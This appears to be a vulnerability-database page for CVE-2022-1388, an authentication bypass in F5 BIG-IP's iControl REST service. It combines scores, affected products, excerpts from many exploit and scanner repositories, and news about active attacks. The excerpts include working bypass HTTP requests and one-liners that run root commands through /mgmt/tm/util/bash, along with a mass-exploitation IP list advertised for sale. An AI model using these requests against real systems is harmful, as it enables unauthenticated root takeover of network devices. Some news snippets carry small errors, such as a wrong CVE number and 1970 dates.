Published: 05/05/2022 Updated: 12/05/2022

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

On F5 BIG-IP 16.1.x versions before 16.1.2.2, 15.1.x versions before 15.1.5.1, 14.1.x versions before 14.1.4.6, 13.1.x versions before 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Vulnerable Product	Search on Vulmon	Subscribe to Product
f5 big-ip access policy manager
f5 big-ip advanced firewall manager
f5 big-ip analytics
f5 big-ip application acceleration manager
f5 big-ip application security manager
f5 big-ip domain name system
f5 big-ip fraud protection service
f5 big-ip global traffic manager
f5 big-ip link controller
f5 big-ip local traffic manager
f5 big-ip policy enforcement manager

This Metasploit module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint Successful exploitation results in remote code execution as the root user ...

F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388 ...

F5 BIG-IP version 160x remote code execution exploit ...

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388

CVE-2022-1388 by 1vere$k CVE-2022-1388 the proof-of-concept Two regimes of work with: simple target URL, default PORT will be set as 80 if it wasn't mentioned; file with list of targets <IP>:<PORT> \n\r; Usage echo "+-------------------For-The-Help-------------------------------------+"; echo "Example#1: /cve-2022-1388sh -h

CVE-2022-1388-Exploit Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)

CVE-2022-1388 supportf5com/csp/article/K23605346 此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身 IP 地址对 BIG-IP 系统进行网络访问，以执行任意系统命令、创建或删除文件或禁用服务。将F5 IP地址写入F5_IP后，执行CVE-2022-1388_scansh，如果存在漏洞将会打印参考： githubcom

CVE-2022-1388 CVE-2022-1388 Scanner Usage $python3 evillizard-cve-2022-1388-scannerpy urlstxt $cat urlstxt 1111 2222 3333

CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java Included Scan a single target Scan many targets Exploit with a shell JDK11 required Setup LAB You can find the lab Here Download Download windows executable file Here Download JAR file Here Run user# java -jar CVE2022-1388jar help or user# CVE2022-1388exe he

CVE-2022-1388 Checking and exploit for CVE-2022-1388 Installation: python3 -m pip install -r requirementstxt Usage Single : python3 cvepy s [fullurl] [api_command] #example python3 cvepy s 127001:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

cve-2022-1388-iveresk-command-shell Improved POC for CVE-2022-1388 that affects multiple F5 products

CVE-2022-1388-POC BIG-IP iCONTROL REST API AUTH BYPASS /RCE EXPLOIT BIG-IP RCE 2022 DETAILS: THE iCONTROL REST API Of BIG-IP cantain a flaw with a CVE score of 98 that sending a (REDACTED) request to auth backend will bypass the auth and can execute arbitrary system commands,create or delete files MITIGATION: supportf5com/csp/article/K23605346 only 12x and 11x will

F5 BIG-IP RCE Check Images： CVE-2022-1388 F5 BIG-IP iControl Rest API exposed RCE Check

CVE-2022-1388-checker Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5) [+] Uso: /CVE-2022-1388sh hoststxt

CVE-2022-1388 On F5 BIG-IP 161x versions prior to 16122, 151x versions prior to 15151, 141x versions prior to 14146, 131x versions prior to 1315, and all 121x and 116x versions, undisclosed requests may bypass iControl REST authentication Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

CVE-2022-1388-EXP This is CVE-2022-1388-EXP Author:Caps@BUGFOR Github:githubcom/bytecaps Remaker:LinJacck Github:githubcom/LinJacck 功能展示验证模式：python CVE_2022_1388py -v -u target_url 攻击模式：python CVE_2022_1388py -a -u target_url -c command 批量检测：python CVE_2022_1388py -s -f file WebShell模式：python CVE_2022_1388py -

CVE-2022-1388-PocExp CVE-2022-1388-PocExp,新增了多线程 Usgae Usage Single URL：python3 CVE-2022-1388py -u url Usage, List of URLS：python3 CVE-2022-1388py -f urltxt Usage, Exec：python3 CVE-2022-1388py -u url -c command Usage, ExecFile：python3 CVE-2022-1388py -f urltxt -c id

CVE-2022-1388 CVE-2022-1388

F5 Azure ARM templates F5 Azure ARM Templates 10 Notice: These legacy templates are now in maintenance mode and are being replaced by our next-generation templates available in the Cloud Templates 20 GitHub repo We recommend you adopt the next-generation templates as soon as is feasible Warning: Due to vulnerabilities related to CVE-2022-1388, do not use templ

CVE-2022-1388 EXPLOIT POC [F5 BIG IP] POST /mgmt/tm/util/bash HTTP/11 Host: REDACTED:8083 Content-Length: 45 Connection: Keep-Alive,X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: SherlockSecure Content-Type: application/json Authorization: Basic YWRtaW46aG9yaXpvbjM= { "command":"run", "utilCmdArgs":"-c id" }

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 98 The iControl REST API is used for the management and configuration of BIG-IP devices CVE-2022-1388 could be exploited by an unauthenticated attac

BIG-IP iControl REST vulnerability CVE-2022-1388 PoC This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services PoC You can use the following curl one liner to check for the F5 BigIP vulnerability or use th

F5-BigIP-CVE-2022-1388 Reverse Shell for CVE-2022-1388

F5 Azure ARM Templates Warning: Due to vulnerabilities related to CVE-2022-1388, do not use templates unless using a custom image (template parameter = bigIpImage) Updated images are pending publication to Marketplace For existing deployments, F5 recommends upgrading to a patched software version Please see K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 fo

F5 Google Cloud Deployment Manager Templates Warning: Due to vulnerabilities related to CVE-2022-1388, do not use templates unless using a custom image (template parameter = bigIpImageName) Updated images are pending publication to Marketplace For existing deployments, F5 recommends upgrading to a patched software version Please see K23605346: BIG-IP iControl REST vuln

CVE-2022-1388 CVE-2022-1388

CVE-2022-1388 Nuclei Template for CVE-2022-1388 Reference: supportf5com/csp/article/K23605346 POC

CVE-2022-1388 by PsychoSec Improved POC for CVE-2022-1388 that affects multiple F5 products This is an improved version of Horizon3's Proof of Concept for CVE-2022-1388: githubcom/horizon3ai/CVE-2022-1388 This version contains multiple improvements as well as an interactive shell to run remote commands Technical Analysis Horizon3's technical root cause anal

CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞 Optional Arguments: -h, --help show this help message and exit -u url, --url url Target url eg:"127001" -f file, --file file Targets in file eg:"iptxt" Use python3 CVE-2022-1388py -u 127001 python3 CVE-2022-1388py -f iptxt Link wwwhenry4e36top/inde

CVE-2022-1388 POC for CVE-2022-1388 affecting multiple F5 products Follow the Horizon3ai Attack Team on Twitter for the latest security research: Horizon3 Attack Team James Horseman Zach Hanley Usage root@kali:/home/dev# python3 CVE-2022-1388py -t 1921680221 -c id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

Nuclei-Template-Exploit-CVE-2022-1388-BIG-IP-iControl-REST CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 98 The iControl REST API is used for the management and configuration of BIG-IP devices CVE-2022-1388 could be exploited by an unauthenticated attacker w

CVE-2022-1388 BIG-IP iControl REST vulnerability CVE-2022-1388 Usage This POC is Unverified! Reference twittercom/1ZRR4H/status/1522150111429726209

Nuclei-Template---CVE-2022-1388-BIG-IP-iControl-REST-Exposed This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services There is no data plane exposure; this is a control plane issue only

CVE-2022-1388 CVE-2022-1388 is a critical vulnerability (CVSS 98) in the management interface of F5 Networks’ BIG-IP solution that enables an unauthenticated attacker to gain remote code execution on the system through bypassing F5’s iControl REST authentication The vulnerability was first discovered by F5’s internal product security team and disclosed publi

F5-BIG-IP-exploit CVE-2022-1388 usage: CVE-2022-1388py [-h] [-u URL] [-c COMMAND] [-f FILE] CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE Eg: python3 CVE-2022-1388py -u 127001 python3 CVE-2022-1388py -u 127001 -c 'cat /etc/passwd' python3 CVE-2022-1388py -f urlstxt Shodan dork: httptitle:&qu

Intro: I’m a Security Researcher working in Cyber Threat Intelligence Read about my first year in CTI here Fun fact: I discovered OZH RAT I've contributed to the Mitre ATT&CK framework - TeamTNT Tweet about Malware Campaigns here Tweet Phishing Campaigns here Previously worked for Cyjax, read my Research Blogs here Currently working at the Equinix Th

CVE-2022-1388 may the poc with you！以下操作是外面捡来的 step 1 get githubcom/ffuf/ffuf step 2 get big5 list step 3 test them ffuf -w big5-listtxt -u FUZZ//mgmt/tm/util/bash -X POST -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: 4396" -d '{"command":"run","utilCmdArgs":"

F5-Big-IP-CVE-2022-1388 CVE-2022-1388 F5 Big IP unauth remote code execution

BIG-IP Scanner Determine the running software version of a remote F5 BIG-IP management interface Developed with by the Bishop Fox Cosmos team Getting started Install git clone githubcom/bishopfox/bigip-scannergit && cd bigip-scanner python3 -m venv venv source venv/bin/activate python3 -m pip install -U pip python3 -m pip install -r requirementstxt

CVE-2022-1388-Scanner

Exploit CVE CVE Lists CVE-2022-1388

CVE-2022-1388-mass BIG-IP auth bypass and rce mass with multi thread details change the host to ur list of ips without format change the command to urs and enjoy

CVE-2022-1388-RCE-checker Simple bash script to check CVE-2022-1388 RCE (F5) [+] Usage: /CVE-2022-1388sh hoststxt

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE Usage Vulnerability detection against a URL $ python CVE-2022-1388py -u 1921682110 [+] 1921682110 is vulnerable!!! Execute arbitrary commands $ python CVE-2022-1388py -u 1921682110 -c 'cat /etc/passwd' root:x:0:0:root:/roo

CVE-2022-1388 CVE-2022-1388 POC exploit

CVE2022-1388_TestAPI A Test API for testing the POC against CVE-2022-1388

CVE-2022-1388

cve-2022-1388-mass big-ip icontrol rest auth bypass RCE MASS with huge list of ip dumped huge list of ips dumped from fofa and censys ~30000 and with a list of ~600 already tested vulnerable from priv search, mass multi processor script, out the vuln target to file name(hittxt) only one copy for sell to avoid conflicts between miners /or bounty hunters satoshidiskcom/

CVE-2022-1388-rs Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust Summary To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability: Connection header must include X-F5-Auth-Token X-F5-Auth-Token header must be present Host header must be localhost / 127001 or the C

CVE-2022-1388-rs CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

CVE-2022-1388 RCE checker Simple bash script to check CVE-2022-1388 RCE (F5 BIG-IP) [+] Usage: /CVE-2022-1388sh hoststxt CVE-2022-1388 RCE POC Exploit curl -X POST <IP_Address_here>/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Toke

Exploit-F5-CVE-2022-1388 PoC For F5 BIG-IP - bash script Exploit one Liner Vulnerable Versions : BIG-IP versions 1610 to 1612 (Patch released) BIG-IP versions 1510 to 1515 (Patch released) BIG-IP versions 1410 to 1414 (Patch released) BIG-IP versions 1310 to 1314 (Patch released) BIG-IP versions 1210 to 1216 (End of Support) BIG-IP versions 1161 to 1165

F5 BIG-IP RCE exploitation (CVE-2022-1388) POST (1): POST /mgmt/tm/util/bash HTTP/11 Host: <redacted>:8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 {"command": "run" , "utilCmdArgs": " -c 'id' " } curl commandliner: $ curl

CVE-2022-1388 #POC POST /mgmt/tm/util/bash HTTP/11 Host: redactedcom Content-Length: 115 Connection: Keep-Alive Content-Length: 0 Cache-Control: max-age=0 X-F5-Auth-Token: Authorization: Basic YWRtaW46 { "command":"run", "utilCmdArgs":"-c id" }

CVE-2022-1388 BIG-IP iControl REST vulnerability CVE-2022-1388 This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services There is no data plane exposure; this is a control plane issue only USAGE 1、writ

CVE-2022-1388-RCE-checker Simple bash script to check CVE-2022-1388 RCE (F5) [+] Usage: /CVE-2022-1388sh hoststxt

F5 AWS CloudFormation Templates AWS v2: Warning: Due to vulnerabilities related to CVE-2022-1388, do not use templates unless using a custom image (template parameter = bigIpCustomImageId) Updated images are pending publication to Marketplace For existing deployments, F5 recommends upgrading to a patched software version Please see K23605346: BIG-IP iControl REST vulne

CVE-2022-1388 Poc:pocsuite -r CVE-2022-1388_F5_BIG-IP_POC_EXPpy -u url Exp:pocsuite -r CVE-2022-1388_F5_BIG-IP_POC_EXPpy -u url --attack --command [] 免责声明此工具仅用于学习、研究和自查。不应将其用于非法目的。使用本工具产生的一切风险与我无关！ Disclaimer This tool is for study, research, and self-examination only It should no

CVE-2022-1388-F5-BIG-IP 在同级目录下放targettxt 直接执行即可

westone-CVE-2022-1388-scanner Undisclosed requests may bypass iControl REST authentication Installation & Usage git clone githubcom/Osyanina/westone-CVE-2021-21980-scannergit cd westone-CVE-2022-1388-scanner cmd CVE-2022-1388exe

20221-2021-F5-BIG-IP-IQ-RCE I modified it so you can use CVE-2022-1388/CVE-2021-22986 and F5 BIG-IP RCE vuln checks and exploiters the normal checkpy and exppy is 2022 but CVE_2021, newpoc, and f5restjar are from the 2021 version Idk why but I added the CVE-2022-1388 REST Auth Bypass RCE but all you gotta do is do python checkpy to see all cmds 2021/CVE_2021 Basic use pyth

20221-2021-F5-BIG-IP-IQ-RCE I modified it so you can use CVE-2022-1388/CVE-2021-22986 and F5 BIG-IP RCE vuln checks and exploiters the normal checkpy and exppy is 2022 but CVE_2021, newpoc, and f5restjar are from the 2021 version but all you gotta do is do python checkpy to see all cmds 2021 Basic use python3 CVE_2021py Vuln check: python3 CVE_2021_22986py -v true -u htt

personal-checkout-list just a list of stuff for me to go through at some point, aka a nicely formatted repo of my stars xd very much a WIP, i have 700+ stars to sort through shoulda done this earlier heck Cloud Cloud tools cloudgoat - Vulnerable AWS deployment tool warhorse - Ansible playbook for deploying cloud infra for security assessments Cloud resources CloudPentes

POC exploit index Colections of POC exploit for CVEs 2020 Name/CVE Username Reference CVE-2020-5902 superzerosec cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2020-5902 CVE-2020-7247 superzerosec cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2020-7247 2021 Name/CVE Username Reference ProxyShell superzerosec wwwtenablecom/blog/proxyshell-at

CISA tells federal agencies to fix actively exploited F5 BIG-IP bug

BleepingComputer • Sergiu Gatlan • 11 May 2022

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices.
F5 customers using BIG-IP solutions include governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company
that "48 of Fortune 50 companies are F5 customers."
F5 solutions are also deployed...

Threatpost • Threatpost • 10 May 2022

Threat actors have started exploiting a critical bug in the application service provider F5’s BIG-IP modules after a working exploit of the vulnerability was publicly made available.
The critical vulnerability, tracked as CVE-2020-1388, allows unauthenticated attackers to launch “arbitrary system commands, create or delete files, or disable services” on its BIG-IP systems.
F5 issued a warning last week when researchers identified the critical flaw.

Those patches an...

BleepingComputer • Lawrence Abrams • 10 May 2022

A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.
Last week,
a vulnerability tracked as CVE-2022-1388 that allows remote attackers to execute commands on BIG-IP network devices as 'root' without authentication. Due to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.
A few days later, researchers began publicly publishing expl...

BleepingComputer • Lawrence Abrams • 10 May 2022

Threatpost • Sagar Tiwari • 05 May 2022

Application service provider F5 is warning a critical vulnerability allows unauthenticated hackers with network access to execute arbitrary commands on its BIG-IP systems.
The F5 BIG-IP is a combination of software and hardware that is designed around access control, application availability and security solutions.
The vulnerability is tracked as CVE-2022-1388 with a severity rating of 9.8 out of 10 by the Common Vulnerabilities Scoring System (CVSS) version 3.90.

...

BleepingComputer • Lawrence Abrams • 01 Jan 1970

Security researchers are warning F5 BIG-IP admins to immediately install the latest security updates after creating exploits for a recently disclosed critical CVE-2022-1388 remote code execution vulnerability.
Last week, F5 disclosed a new critical remote code execution in BIG-IP networking devices tracked as CVE-2022-1388. This vulnerability affects the BIG-IP iControl REST authentication component and allows remote threat actors to bypass authentication and execute commands on the device...

BleepingComputer • Sergiu Gatlan • 01 Jan 1970

In a joint advisory issued today, CISA and the Multi-State Information Sharing and Analysis Center (MS-ISAC) warned admins of active attacks targeting a critical F5 BIG-IP network security vulnerability (CVE-2022-1388).
"CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks," the advisory
.
"CISA encourages users and administrators to ...

The Register • Jeff Burt • 01 Jan 1970

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources BIG-IP iControl authentication bypass, NFV VM escape, and more

F5 Networks and Cisco this week issued warnings about serious, and in some cases critical, security vulnerabilities in their products.
F5 officials said Thursday its most serious issue, a critical flaw in its iControl REST framework with a severity score of 9.8 out of 10, could be exploited to bypass the authentication software, used by its BIG-IP portfolio, and hijack equipment. Specifically, the vulnerability, tracked as CVE-2022-1388, can be abused by miscreants to, among other things, ...

BleepingComputer • Bill Toulas • 01 Jan 1970

F5 has issued a security advisory warning about a flaw that may allow unauthenticated attackers with network access to execute arbitrary system commands, perform file actions, and disable services on BIG-IP.
The vulnerability is tracked as CVE-2022-1388 and has a CVSS v3 severity rating of 9.8, categorized as critical. Its exploitation can potentially lead up to a complete system takeover.
According to F5's security advisory, the flaw lies in the iControl REST component and allows a ...

BleepingComputer • Ionut Ilascu • 01 Jan 1970

Threat actors have started massively exploiting the critical vulnerability tracked as
, which affects multiple versions of all F5 BIG-IP modules, to drop malicious payloads.
F5 last week
for the security issue (9.8 severity rating), which affects the BIG-IP iControl REST authentication component.
The company warned that the vulnerability enables an unauthenticated attacker on the BIG-IP system to run “arbitrary system commands, create or delete files, or disable serv...

BleepingComputer • Ionut Ilascu • 01 Jan 1970

Get Started

CVE-2022-1388

Vulnerability Summary

Most Upvoted Vulmon Research Post

Vulnerability Trend

Mailing Lists

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect